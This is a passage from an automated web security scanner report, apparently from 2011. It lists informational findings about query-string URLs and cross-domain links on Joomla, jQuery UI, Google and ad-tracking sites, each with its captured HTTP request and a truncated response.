<li class="item123"><a href="http://community.joomla.org"><span>
...[SNIP]...
<li class="item124"><a href="http://forum.joomla.org"><span>
...[SNIP]...
<li class="item125"><a href="http://extensions.joomla.org"><span>
...[SNIP]...
<li class="item126"><a href="http://docs.joomla.org"><span>
...[SNIP]...
<li class="item127"><a href="http://developer.joomla.org"><span>
...[SNIP]...
<li class="item149"><a href="http://shop.joomla.org"><span>
...[SNIP]...
<div class="toplogo">
<a href="http://www.joomla.org/"><img src="http://joomlacode.org/themes/gforge5/images/joomla_logo.png" alt="Joomla!">
...[SNIP]...
:relative; top:0px;' onclick='SearchByIDMenu();' onmouseover='this.src="/themes/gforge5/images/purple_searchbyid_mouseover.gif";' onmouseout='this.src="/themes/gforge5/images/purple_searchbyid.gif";'/><a href="http://gforgegroup.com/es/help.php?section=project-news" target="_blank" style='float:left; position:relative; top:0px;'><img title='Help' class='HelpMenu' id='helpIcon' src='/themes/gforge5/images/help_mouseOff.gif' style='float:left; position:relative; top:0px;' onmouseover='this.src="/themes/gforge5/images/help_mouseO
...[SNIP]...
<div class="rochenleft">
           <a href="http://www.rochenhost.com" target="_blank"><img src="http://joomlacode.org/themes/gforge5/images/rochen_logo_joomlacode_leftcol.jpg" alt="Joomla Hosting by Rochen">
...[SNIP]...
<div id="footerInfo">&copy;2005-2008 <a href="http://www.opensourcematters.org">Open Source Matters, Inc.</a> All rights reserved. <a href="http://www.rochenhost.com" target="_blank">Joomla Hosting</a> by Rochen Ltd.&nbsp;&nbsp;&nbsp;
       <a href="http://www.joomla.org/accessibility-statement.html">Accessibility Statement</a>&nbsp;&nbsp;&nbsp;
       <a href="http://www.joomla.org/privacy-policy.html">Privacy Policy</a>&nbsp;&nbsp;&nbsp;
       <a href="http://gforgegroup.com/">Gforge</a>
...[SNIP]...

20.88. http://joomlacode.org/gf/project/opengallery/news/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/opengallery/news/

Issue detail

The page was loaded from a URL containing a query string:
  • http://joomlacode.org/gf/project/opengallery/news/?action=NewsThreadView&id=3278
The response contains the following links to other domains:
  • http://community.joomla.org/
  • http://developer.joomla.org/
  • http://docs.joomla.org/
  • http://extensions.joomla.org/
  • http://forum.joomla.org/
  • http://gforgegroup.com/
  • http://gforgegroup.com/es/help.php?section=project-news
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://shop.joomla.org/
  • http://www.joomla.org/
  • http://www.joomla.org/about-joomla.html
  • http://www.joomla.org/accessibility-statement.html
  • http://www.joomla.org/privacy-policy.html
  • http://www.opensourcematters.org/
  • http://www.rochenhost.com/

Request

GET /gf/project/opengallery/news/?action=NewsThreadView&id=3278 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:37:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20023


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<li class="item122"><a href="http://www.joomla.org/"><span>
...[SNIP]...
<li class="item153"><a href="http://www.joomla.org/about-joomla.html"><span>
...[SNIP]...
<li class="item123"><a href="http://community.joomla.org"><span>
...[SNIP]...
<li class="item124"><a href="http://forum.joomla.org"><span>
...[SNIP]...
<li class="item125"><a href="http://extensions.joomla.org"><span>
...[SNIP]...
<li class="item126"><a href="http://docs.joomla.org"><span>
...[SNIP]...
<li class="item127"><a href="http://developer.joomla.org"><span>
...[SNIP]...
<li class="item149"><a href="http://shop.joomla.org"><span>
...[SNIP]...
<div class="toplogo">
<a href="http://www.joomla.org/"><img src="http://joomlacode.org/themes/gforge5/images/joomla_logo.png" alt="Joomla!">
...[SNIP]...
:relative; top:0px;' onclick='SearchByIDMenu();' onmouseover='this.src="/themes/gforge5/images/purple_searchbyid_mouseover.gif";' onmouseout='this.src="/themes/gforge5/images/purple_searchbyid.gif";'/><a href="http://gforgegroup.com/es/help.php?section=project-news" target="_blank" style='float:left; position:relative; top:0px;'><img title='Help' class='HelpMenu' id='helpIcon' src='/themes/gforge5/images/help_mouseOff.gif' style='float:left; position:relative; top:0px;' onmouseover='this.src="/themes/gforge5/images/help_mouseO
...[SNIP]...
<div class="rochenleft">
           <a href="http://www.rochenhost.com" target="_blank"><img src="http://joomlacode.org/themes/gforge5/images/rochen_logo_joomlacode_leftcol.jpg" alt="Joomla Hosting by Rochen">
...[SNIP]...
<div id="footerInfo">&copy;2005-2008 <a href="http://www.opensourcematters.org">Open Source Matters, Inc.</a> All rights reserved. <a href="http://www.rochenhost.com" target="_blank">Joomla Hosting</a> by Rochen Ltd.&nbsp;&nbsp;&nbsp;
       <a href="http://www.joomla.org/accessibility-statement.html">Accessibility Statement</a>&nbsp;&nbsp;&nbsp;
       <a href="http://www.joomla.org/privacy-policy.html">Privacy Policy</a>&nbsp;&nbsp;&nbsp;
       <a href="http://gforgegroup.com/">Gforge</a>
...[SNIP]...

20.89. http://joomlacode.org/gf/search/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/search/

Issue detail

The page was loaded from a URL containing a query string:
  • http://joomlacode.org/gf/search/?action=SearchById
The response contains the following links to other domains:
  • http://community.joomla.org/
  • http://developer.joomla.org/
  • http://docs.joomla.org/
  • http://extensions.joomla.org/
  • http://forum.joomla.org/
  • http://gforgegroup.com/
  • http://gforgegroup.com/es/help.php?section=
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://shop.joomla.org/
  • http://www.joomla.org/
  • http://www.joomla.org/about-joomla.html
  • http://www.joomla.org/accessibility-statement.html
  • http://www.joomla.org/privacy-policy.html
  • http://www.opensourcematters.org/
  • http://www.rochenhost.com/

Request

GET /gf/search/?action=SearchById HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:13:06 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8579


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<li class="item122"><a href="http://www.joomla.org/"><span>
...[SNIP]...
<li class="item153"><a href="http://www.joomla.org/about-joomla.html"><span>
...[SNIP]...
<li class="item123"><a href="http://community.joomla.org"><span>
...[SNIP]...
<li class="item124"><a href="http://forum.joomla.org"><span>
...[SNIP]...
<li class="item125"><a href="http://extensions.joomla.org"><span>
...[SNIP]...
<li class="item126"><a href="http://docs.joomla.org"><span>
...[SNIP]...
<li class="item127"><a href="http://developer.joomla.org"><span>
...[SNIP]...
<li class="item149"><a href="http://shop.joomla.org"><span>
...[SNIP]...
<div class="toplogo">
<a href="http://www.joomla.org/"><img src="http://joomlacode.org/themes/gforge5/images/joomla_logo.png" alt="Joomla!">
...[SNIP]...
:relative; top:0px;' onclick='SearchByIDMenu();' onmouseover='this.src="/themes/gforge5/images/purple_searchbyid_mouseover.gif";' onmouseout='this.src="/themes/gforge5/images/purple_searchbyid.gif";'/><a href="http://gforgegroup.com/es/help.php?section=" target="_blank" style='float:left; position:relative; top:0px;'><img title='Help' class='HelpMenu' id='helpIcon' src='/themes/gforge5/images/help_mouseOff.gif' style='float:left; position:relative; top:0px;' onmouseover='this.src="/themes/gforge5/images/help_mouseO
...[SNIP]...
<div id="footerInfo">&copy;2005-2008 <a href="http://www.opensourcematters.org">Open Source Matters, Inc.</a> All rights reserved. <a href="http://www.rochenhost.com" target="_blank">Joomla Hosting</a> by Rochen Ltd.&nbsp;&nbsp;&nbsp;
       <a href="http://www.joomla.org/accessibility-statement.html">Accessibility Statement</a>&nbsp;&nbsp;&nbsp;
       <a href="http://www.joomla.org/privacy-policy.html">Privacy Policy</a>&nbsp;&nbsp;&nbsp;
       <a href="http://gforgegroup.com/">Gforge</a>
...[SNIP]...

20.90. http://jqueryui.com/themeroller/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The page was loaded from a URL containing a query string:
  • http://jqueryui.com/themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
The response contains the following links to other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
  • http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.8/jquery-ui.min.js
  • http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.8/themes/base/jquery-ui.css
  • http://docs.jquery.com/Donate
  • http://jquery.com/
  • http://jquery.org/
  • http://plugins.jquery.com/
  • http://static.jquery.com/ui/css/base2.css
  • http://static.jquery.com/ui/themeroller/app_css/app_screen.css
  • http://static.jquery.com/ui/themeroller/scripts/app.js
  • http://www.filamentgroup.com/

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:38:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120026

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="icon" href="/images/favicon.ico" type="image/x-icon" />
           <link rel="stylesheet" href="http://static.jquery.com/ui/css/base2.css" type="text/css" media="all" />
           <link rel="stylesheet" href="http://static.jquery.com/ui/themeroller/app_css/app_screen.css" type="text/css" media="all" />
           <link rel="stylesheet" href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.8/themes/base/jquery-ui.css" type="text/css" media="all" />
           <link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bg
...[SNIP]...
Shadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
           <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js" type="text/javascript"></script>
           <script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.8/jquery-ui.min.js" type="text/javascript"></script>
           <script src="http://static.jquery.com/ui/themeroller/scripts/app.js" type="text/javascript"></script>
...[SNIP]...
<li>
                   <a href="http://jquery.com">jQuery</a>
...[SNIP]...
<li style="padding-right: 12px;">
                   <a href="http://plugins.jquery.com/">Plugins</a>
...[SNIP]...
<li>
                   <a href="http://docs.jquery.com/Donate">Donate</a>
...[SNIP]...
</span>
               <a class="block filamentgroup" href="http://www.filamentgroup.com"><span>
...[SNIP]...
<span class="first" style="float: right; padding-right: 12px;">&copy; 2010 The <a href="http://jquery.org/">jQuery Project</a>
...[SNIP]...

20.91. http://linkhelp.clients.google.com/tbproxy/lh/fixurl

Summary

Severity:   Information
Confidence:   Certain
Host:   http://linkhelp.clients.google.com
Path:   /tbproxy/lh/fixurl

Issue detail

The page was loaded from a URL containing a query string:
  • http://linkhelp.clients.google.com/tbproxy/lh/fixurl?hl=en-US&sd=com&url=http%3A%2F%2Fwww.traderpub.com%2Fx22&sourceid=chrome&error=http404
The response contains the following link to another domain:
  • http://www.traderpub.com/

Request

GET /tbproxy/lh/fixurl?hl=en-US&sd=com&url=http%3A%2F%2Fwww.traderpub.com%2Fx22&sourceid=chrome&error=http404 HTTP/1.1
Host: linkhelp.clients.google.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:25 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Server: linkdoctor/fixurlserver
X-XSS-Protection: 1; mode=block
Content-Length: 6358

<!DOCTYPE html><html lang="en" ><meta charset="utf-8" /><title>Oops! This link appears to be broken - www.traderpub.com/x22</title><script type="text/javascript">(function(){function a(d){this.t={};th
...[SNIP]...
<li>Go to <a href="http://www.traderpub.com/" onmousedown="return rwctrd(this,'hs','0','http://www.google.com/url?sa=D&q=http://www.traderpub.com/&usg=AFQjCNFnKst7CsdJFClQ2BYJjWTFPl4LBw');"><b>
...[SNIP]...

20.92. http://loadus.exelator.com/load/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadus.exelator.com
Path:   /load/

Issue detail

The page was loaded from a URL containing a query string:
  • http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
The response contains the following links to other domains:
  • http://ad.yieldmanager.com/pixel?id=285379&data=245001&id=716806&data=245001&id=199372&data=245001&id=302775&data=245001&id=716807&data=245001&t=2
  • http://www.googleadservices.com/pagead/conversion/1027512774/?label=vx5_CJzR0gEQxrP66QM&guid=ON&script=0

Request

GET /load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no HTTP/1.1
Host: loadus.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJxLtDK0qi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNlKxrAa8pD0k%253D; myPAL=eJxLtDK2qs60MrAutjIyt1IyNDGzVLa0tDRUNjQwUTYwM1AOATJ8gSJGStaZVoYgZWYgZeamUGXmBsoGBoZAZeYGMFVGcMPgqjANqwUAip0atg%253D%253D; BFF=eJxLtDKxqi62MjSwUgoxNDDxdbC0tDRSss60MjQxN7UGShhbKfn6%252B4V4%252BETGh3kGe4YoWSdameLSYmYJ1GIKFUcSQlFrjCRhCRI3N0C31QQiDBepxW4EWC1WI2oBnuw0eQ%253D%253D; TFF=eJyNj7ENgDAMBHdhgncIsew0GYM2RQokOugQu2MoKAKIFNa7uHvps4pui5LTjuATApKIuC5mdbpNStHO82CB6w0S9wdPJ99XvLPrK49vrc2whG%252FvLmOZ81q%252Buv3bCkYC6Ge1vU%252F%252BczVVHt9am2HJaCL3AyAZcuM%253D

Response

HTTP/1.1 200 OK
X-Cnection: close
X-Powered-By: PHP/5.2.1
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: application/x-javascript
Set-Cookie: xltl=eJxLtDKyqi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNwOqslHyCnJWsM60MTSxMDSzNzKxrASUcFEk%253D; expires=Tue, 24-May-2011 21:06:41 GMT; path=/; domain=.exelator.com
Set-Cookie: myPAL=eJxtzL0OwjAMRtF3iVcPtvPj2pkKLEiEAVWoK2NnRsS7k1bQic2yzncfnvy1ONWni3rgVAzMjIEpARWCqR%252BtfyTUxXllZWWav0wJiLgzpZ%252BSPbarf7HYWdpiQwYZclTDSKJ9JClv1fEw4fl6x1ub8XhpOJ7mUN8fByon7A%253D%253D; expires=Fri, 25-Mar-2011 21:06:41 GMT; path=/; domain=.exelator.com
Set-Cookie: BFF=eJytkb0OwiAUhd%252BFJ%252BBXCiytOtik1ERJo5Pp6Oxo%252Bu7eUjXYXAYS1%252B8cvpbDaJm0z4dl1JLAqPS1MYYTdweulYNAWOKPfTh019vQnttA3Gg5zZ3ZGDij3jxBP12RBGbmmq4%252FKxec%252FggYmm2oeaWENktQzYGIPAGfpqBca7UK2n5AFcCRJqo4%252BQuqAI40GdxXcyRA3bvOo27gSBNVNHvELSL%252Fggl%252FkTh05kWy%252B5fPXb7uH8cs3W56Ab%252BfvsY%253D; expires=Tue, 24-May-2011 21:06:41 GMT; path=/; domain=.exelator.com
Set-Cookie: TFF=eJydkDEOwzAIRe%252BSEwC2g8FLjtHVQ4ZK3dotyt1LWjWRnKRFHRDIeg%252FxXRWTTndF0g4hDtDDICLUlaqk01WxWEVO1uA19lLmHY8LHxqerELj8ar5DOsQ%252FbvHy3irj7HZnT%252FGYQqGAQB%252FpLZxz5%252BmxsbjVfMZ1hmcu5ebKKazDHnLkN983HjKKbCc%252FRZ%252BMVEkMP1jBiDm5DV5FX2GvcXkIucn21jBjA%253D%253D; expires=Tue, 24-May-2011 21:06:41 GMT; path=/; domain=.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 24-Jan-2010 21:06:40 GMT; path=/; domain=load.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 24-Jan-2010 21:06:40 GMT; path=/; domain=loadus.exelator.com
Set-Cookie: EVX=eJxLtDKyqs60MrIwNTa3tE60MgTxDKyLrQwtrJQMTSxM483jjUxM4w0MDOOBUMm6NtPK2MDI3NyUKMW1ALLGGNA%253D; expires=Tue, 24-May-2011 21:06:41 GMT; path=/; domain=.exelator.com
Date: Mon, 24 Jan 2011 21:06:41 GMT
Server: HTTP server
Content-Length: 975

document.write('<img src="http://ad.yieldmanager.com/pixel?id=285379&data=245001&id=716806&data=245001&id=199372&data=245001&id=302775&data=245001&id=716807&data=245001&t=2" width="1" height="1"></img><img src="http://www.googleadservices.com/pagead/conversion/1027512774/?label=vx5_CJzR0gEQxrP66QM&guid=ON&script=0" width="1" height="1" border="0" alt=""></img>
...[SNIP]...

20.93. http://loadus.exelator.com/load/net.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadus.exelator.com
Path:   /load/net.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9hZHMuYWRicml0ZS5jb20vYWRzZXJ2ZXIvYmVoYXZpb3JhbC1kYXRhLzgyMDE%2FZD00OSwxMjMiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGJvcmRlcj0iMCI%2BPC9pbWc%2BPHNjcmlwdCBzcmM9Imh0dHA6Ly9zZWdtZW50LXBpeGVsLmludml0ZW1lZGlhLmNvbS9waXhlbD9wYXJ0bmVySUQ9NzkmY29kZT0yODUzNzkmY29kZT0zMDI3NzUma2V5PXNlZ21lbnQmcmV0dXJuVHlwZT1qcyI%2BPC9zY3JpcHQ%2BPGltZyBzcmM9Imh0dHA6Ly9hLmNvbGxlY3RpdmUtbWVkaWEubmV0L2RhdGFwYWlyP25ldD1leCZzZWdzPTc2LDMyJm9wPWFkZCIgd2lkdGg9IjEiIGhlaWdodD0iMSI%2BPC9pbWc%2B&h=801802b5e74884030c94b77c781c1c27
The response contains the following links to other domains:
  • http://a.collective-media.net/datapair?net=ex&segs=76,32&op=add
  • http://ads.adbrite.com/adserver/behavioral-data/8201?d=49,123
  • http://segment-pixel.invitemedia.com/pixel?partnerID=79&code=285379&code=302775&key=segment&returnType=js

Request

GET /load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9hZHMuYWRicml0ZS5jb20vYWRzZXJ2ZXIvYmVoYXZpb3JhbC1kYXRhLzgyMDE%2FZD00OSwxMjMiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGJvcmRlcj0iMCI%2BPC9pbWc%2BPHNjcmlwdCBzcmM9Imh0dHA6Ly9zZWdtZW50LXBpeGVsLmludml0ZW1lZGlhLmNvbS9waXhlbD9wYXJ0bmVySUQ9NzkmY29kZT0yODUzNzkmY29kZT0zMDI3NzUma2V5PXNlZ21lbnQmcmV0dXJuVHlwZT1qcyI%2BPC9zY3JpcHQ%2BPGltZyBzcmM9Imh0dHA6Ly9hLmNvbGxlY3RpdmUtbWVkaWEubmV0L2RhdGFwYWlyP25ldD1leCZzZWdzPTc2LDMyJm9wPWFkZCIgd2lkdGg9IjEiIGhlaWdodD0iMSI%2BPC9pbWc%2B&h=801802b5e74884030c94b77c781c1c27 HTTP/1.1
Host: loadus.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJxLtDKyqi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNwOqslHyCnJWsM60MTSxMDSzNzKxrASUcFEk%253D; myPAL=eJxtzL0OwjAMRtF3iVcPtvPj2pkKLEiEAVWoK2NnRsS7k1bQic2yzncfnvy1ONWni3rgVAzMjIEpARWCqR%252BtfyTUxXllZWWav0wJiLgzpZ%252BSPbarf7HYWdpiQwYZclTDSKJ9JClv1fEw4fl6x1ub8XhpOJ7mUN8fByon7A%253D%253D; BFF=eJytkb0OwiAUhd%252BFJ%252BBXCiytOtik1ERJo5Pp6Oxo%252Bu7eUjXYXAYS1%252B8cvpbDaJm0z4dl1JLAqPS1MYYTdweulYNAWOKPfTh019vQnttA3Gg5zZ3ZGDij3jxBP12RBGbmmq4%252FKxec%252FggYmm2oeaWENktQzYGIPAGfpqBca7UK2n5AFcCRJqo4%252BQuqAI40GdxXcyRA3bvOo27gSBNVNHvELSL%252Fggl%252FkTh05kWy%252B5fPXb7uH8cs3W56Ab%252BfvsY%253D; TFF=eJydkDEOwzAIRe%252BSEwC2g8FLjtHVQ4ZK3dotyt1LWjWRnKRFHRDIeg%252FxXRWTTndF0g4hDtDDICLUlaqk01WxWEVO1uA19lLmHY8LHxqerELj8ar5DOsQ%252FbvHy3irj7HZnT%252FGYQqGAQB%252FpLZxz5%252BmxsbjVfMZ1hmcu5ebKKazDHnLkN983HjKKbCc%252FRZ%252BMVEkMP1jBiDm5DV5FX2GvcXkIucn21jBjA%253D%253D; EVX=eJxLtDKyqs60MrIwNTa3tE60MgTxDKyLrQwtrJQMTSxM483jjUxM4w0MDOOBUMm6NtPK2MDI3NyUKMW1ALLGGNA%253D

Response

HTTP/1.1 200 OK
X-Cnection: close
X-Powered-By: PHP/5.2.1
Content-Type: text/html
Date: Mon, 24 Jan 2011 21:07:10 GMT
Server: HTTP server
Content-Length: 368

<HTML><BODY><img src="http://ads.adbrite.com/adserver/behavioral-data/8201?d=49,123" width="0" height="0" border="0"></img><script src="http://segment-pixel.invitemedia.com/pixel?partnerID=79&code=285379&code=302775&key=segment&returnType=js"></script><img src="http://a.collective-media.net/datapair?net=ex&segs=76,32&op=add" width="1" height="1"></img>
...[SNIP]...

20.94. http://maps.google.com/maps

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps

Issue detail

The page was loaded from a URL containing a query string:
  • http://maps.google.com/maps?hl=en&tab=wl
The response contains the following links to other domains:
  • http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png
  • http://maps.gstatic.com/mapfiles/gw_link.png
  • http://maps.gstatic.com/mapfiles/mapcontrols3d5.png
  • http://maps.gstatic.com/mapfiles/placepage/checkmark_13x14.gif
  • http://maps.gstatic.com/mapfiles/transparent.png
  • http://www.youtube.com/results?hl=en&sa=N&tab=l1

Request

GET /maps?hl=en&tab=wl HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:40:56 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=2eb5c44f7395ed72:TM=1295908856:LM=1295908856:S=j81Lac1Vce5XALNU; expires=Wed, 23-Jan-2013 22:40:56 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
